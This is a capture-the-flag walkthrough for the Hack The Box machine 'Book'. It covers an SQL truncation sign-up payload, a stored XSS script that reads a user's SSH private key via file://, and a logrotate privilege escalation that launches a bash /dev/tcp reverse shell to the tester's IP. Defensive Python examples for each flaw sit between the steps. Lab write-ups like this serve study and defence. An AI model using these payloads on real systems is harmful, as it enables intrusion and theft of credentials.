SecWalk.com

HTB Walkthrough Book 10.10.10.176

Summary

Foothold

After the Nmap scan we see there are only two ports open. After poking around we discover the sign-up page is vulnerable to an SQL truncation attack.

User

Once we are logged into both the admin site and the normal site we discover an XSS vulnerability; through it we were able to read the id_rsa key and log in to the box.

Root

After some enumeration we discover there is a vulnerability in the logrotate application; after exploiting it we were able to take over the machine completely.

Enumeration

Nmap

nmap -sC -sV -p- 10.10.10.176

Web

10.10.10.176

http://10.10.10.176/admin

Turns out it's vulnerable to SQL truncation:

Intercepting this request with Burp so we can edit it and use the SQL truncation attack:

admin%20%20%20%20%20x&email=admin%40book.htb%20%20%20%20%20%20x&password=12345678

admin@book.htb:12345678
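To make the mechanism behind the padded sign-up request concrete from the defender's side, here is an added example (not code from the box or from the walkthrough author) that mimics the vulnerable registration pattern and places the hardened version next to it. It uses an in-memory SQLite table and emulates MySQL's non-strict behaviour by truncating to the column width in Python; the column widths VARCHAR(10)/VARCHAR(20) are an assumption chosen so that the page's payload (five spaces then "x" after the name, six spaces then "x" after the e-mail) reproduces the collision. The function names, the sample table and the pre-existing admin row are all constructed for the example.

```python
import sqlite3

# Assumed column widths (not taken from the box): the payload on the page pads
# the name to 11 characters and the e-mail to 21, so 10 and 20 reproduce the
# truncation.
NAME_MAX = 10
EMAIL_MAX = 20


def make_db():
    """Constructed users table with a pre-existing admin and no UNIQUE constraint."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("admin", "admin@book.htb", "unknown-strong-password"))
    return conn


def _truncate(value, width):
    """Emulates MySQL without STRICT_TRANS_TABLES: the value is silently cut to
    the column width, and trailing spaces are insignificant for VARCHAR
    comparisons, so they are dropped here as well."""
    return value[:width].rstrip()


def register_vulnerable(conn, name, email, password):
    """Vulnerable pattern: duplicate check on the raw input, truncating INSERT."""
    if conn.execute("SELECT 1 FROM users WHERE email = ?", (email,)).fetchone():
        return "exists"
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 (_truncate(name, NAME_MAX), _truncate(email, EMAIL_MAX), password))
    return "created"


def register_hardened(conn, name, email, password):
    """Hardened: normalise first, reject anything that would not fit the column
    unchanged, then run the duplicate check on the normalised value."""
    name, email = name.strip(), email.strip()
    if not name or not email:
        return "invalid"
    if len(name) > NAME_MAX or len(email) > EMAIL_MAX:
        return "invalid"          # never let the database decide what to keep
    if any(ch.isspace() for ch in email):
        return "invalid"          # an e-mail address never contains whitespace
    if conn.execute("SELECT 1 FROM users WHERE email = ?", (email,)).fetchone():
        return "exists"
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (name, email, password))
    return "created"


def login(conn, email, password):
    """Returns the matched user name or None; this is the row the site trusts."""
    row = conn.execute("SELECT name FROM users WHERE email = ? AND password = ?",
                       (email, password)).fetchone()
    return row[0] if row else None


# The page's payload, URL-decoded.
PAYLOAD_NAME = "admin     x"
PAYLOAD_EMAIL = "admin@book.htb      x"

if __name__ == "__main__":
    vuln = make_db()
    print(register_vulnerable(vuln, PAYLOAD_NAME, PAYLOAD_EMAIL, "12345678"))  # created
    print(login(vuln, "admin@book.htb", "12345678"))                           # admin

    safe = make_db()
    print(register_hardened(safe, PAYLOAD_NAME, PAYLOAD_EMAIL, "12345678"))    # invalid
    print(login(safe, "admin@book.htb", "12345678"))                           # None
```

The vulnerable path creates a second "admin@book.htb" row with a known password because the existence check compares the untruncated string while the INSERT stores the truncated one. Besides the application-side length and whitespace checks shown, a UNIQUE constraint on the e-mail column and MySQL strict mode (which turns truncation into an error) each close the gap on their own.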

XSS attack

10.10.10.176/admin

10.10.10.176

<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>

10.10.10.176/admin

Open the collections

and we get our RSA key:

Note: of course we did some more enumeration with our LFI; that's why we know we need reader as the user.

chmod 600 id_rsa
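From the defender's side, the stored XSS works because the book fields are concatenated unescaped into the HTML that the server-side renderer turns into the admin's collections document. This added example (not the site's code) shows the unsafe rendering next to an escaped version, plus a small scan that flags stored titles carrying script or file:// content; the rows, the table layout and the function names are constructed for the example.

```python
import html
import re

# Constructed rows standing in for the site's collections table. The first
# title is the payload from the walkthrough, as a registered user would store it.
SAMPLE_BOOKS = [
    ("reader",
     '<script> x=new XMLHttpRequest; x.onload=function(){ '
     'document.write(this.responseText.fontsize(1)) }; '
     'x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>',
     "n/a"),
    ("alice", "Secure Coding in C", "alice"),
]


def render_vulnerable(rows):
    """Unsafe: user-controlled fields are pasted straight into the markup."""
    body = "".join(f"<tr><td>{u}</td><td>{t}</td><td>{a}</td></tr>"
                   for u, t, a in rows)
    return f"<table>{body}</table>"


def render_hardened(rows):
    """Escape every user-controlled field; the payload becomes inert text."""
    body = "".join(
        f"<tr><td>{html.escape(u)}</td><td>{html.escape(t)}</td>"
        f"<td>{html.escape(a)}</td></tr>" for u, t, a in rows)
    return f"<table>{body}</table>"


# Detection over already-stored data: script tags, file:// URLs or XHR usage
# have no business in a book title or author field.
SUSPICIOUS = re.compile(r"<\s*script|file://|XMLHttpRequest", re.I)


def flag_suspicious_rows(rows):
    """Return the users whose stored title or author matches the pattern."""
    return [u for u, t, a in rows if SUSPICIOUS.search(t) or SUSPICIOUS.search(a)]


if __name__ == "__main__":
    print("<script>" in render_vulnerable(SAMPLE_BOOKS))   # True
    print("<script>" in render_hardened(SAMPLE_BOOKS))     # False
    print(flag_suspicious_rows(SAMPLE_BOOKS))              # ['reader']
```

Escaping on output stops the injection; the second defence is the renderer itself, which should not be able to resolve file:// URLs when converting untrusted HTML.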

Privilege Escalation

After some enumeration it turns out we found the following vulnerability:

https://www.exploit-db.com/exploits/47466

Compile the exploit:

gcc -o exploit exploit.c

Create a bash script with a reverse shell:

#!/bin/bash

bash -i >& /dev/tcp/10.10.14.25/443 0>&1

nc -lvp 443

./exploit -p shell.sh /home/reader/backups/access.log

To speed things up a bit I log in with another shell and execute the following command to trigger the log rotation:

echo rotateme >> /home/reader/backups/access.log

The shell was unstable, so since there is an id_rsa key I decided to grab that one when the root shell popped up.

chmod 600 root_id

ssh -i root_id root@10.10.10.176
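The root step works because logrotate runs as root against a log file sitting in a directory the low-privileged user owns. An administrator can audit for exactly that condition; the following is an added example (not the exploit and not part of the walkthrough) that parses logrotate-style "path { directives }" blocks and reports entries whose parent directory is owned by a non-root user or is group/world writable and that carry no su directive handing rotation to an unprivileged account. The configuration fragment and the ownership table are constructed; only the access.log path comes from the page.

```python
import os
import re
import stat
from collections import namedtuple

Owner = namedtuple("Owner", "uid gid mode")   # the three facts we need from os.stat

# Constructed logrotate fragment. The first path is the one the page shows being
# rotated; the other paths and all directives are assumptions for the example.
SAMPLE_CONFIG = """
/home/reader/backups/access.log {
    daily
    rotate 7
    compress
}
/var/log/syslog {
    weekly
    rotate 4
}
/home/reader/backups/error.log {
    daily
    rotate 7
    su reader reader
}
"""

BLOCK_RE = re.compile(r"^\s*(\S+)\s*\{(.*?)\}", re.S | re.M)


def parse_logrotate(text):
    """Yield (log_path, [directives]) for each  path { ... }  block."""
    for m in BLOCK_RE.finditer(text):
        directives = [d.strip() for d in m.group(2).splitlines() if d.strip()]
        yield m.group(1), directives


def dir_writable_by_unprivileged(owner):
    """True if the directory is owned by a non-root uid or is group/world writable."""
    return owner.uid != 0 or bool(owner.mode & (stat.S_IWGRP | stat.S_IWOTH))


def rotates_as_unprivileged(directives):
    """True if an  su <user> <group>  directive moves rotation away from root."""
    for d in directives:
        parts = d.split()
        if len(parts) >= 2 and parts[0] == "su":
            return parts[1] != "root"
    return False


def risky_entries(text, stat_fn):
    """Log paths that root-run logrotate would rotate inside a directory an
    unprivileged user controls, with no su directive to drop privileges."""
    risky = []
    for path, directives in parse_logrotate(text):
        owner = stat_fn(os.path.dirname(path))
        if dir_writable_by_unprivileged(owner) and not rotates_as_unprivileged(directives):
            risky.append(path)
    return risky


def fake_stat(path):
    """Constructed ownership data standing in for os.stat on the real host."""
    table = {
        "/home/reader/backups": Owner(uid=1000, gid=1000, mode=0o755),
        "/var/log": Owner(uid=0, gid=0, mode=0o755),
    }
    return table[path]


def real_stat(path):
    """Adapter for a live system: pass this instead of fake_stat."""
    st = os.stat(path)
    return Owner(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))


if __name__ == "__main__":
    for p in risky_entries(SAMPLE_CONFIG, fake_stat):
        print("root-run logrotate rotates a user-controlled directory:", p)
    # prints only /home/reader/backups/access.log
```

On a real host, feed it the concatenated contents of /etc/logrotate.conf and /etc/logrotate.d/* with real_stat. Flagged entries are the ones to move to a root-owned directory, or to rotate under su with the owning user, so that a race in the rotation step cannot create root-owned files on the user's behalf.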

Made by s3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
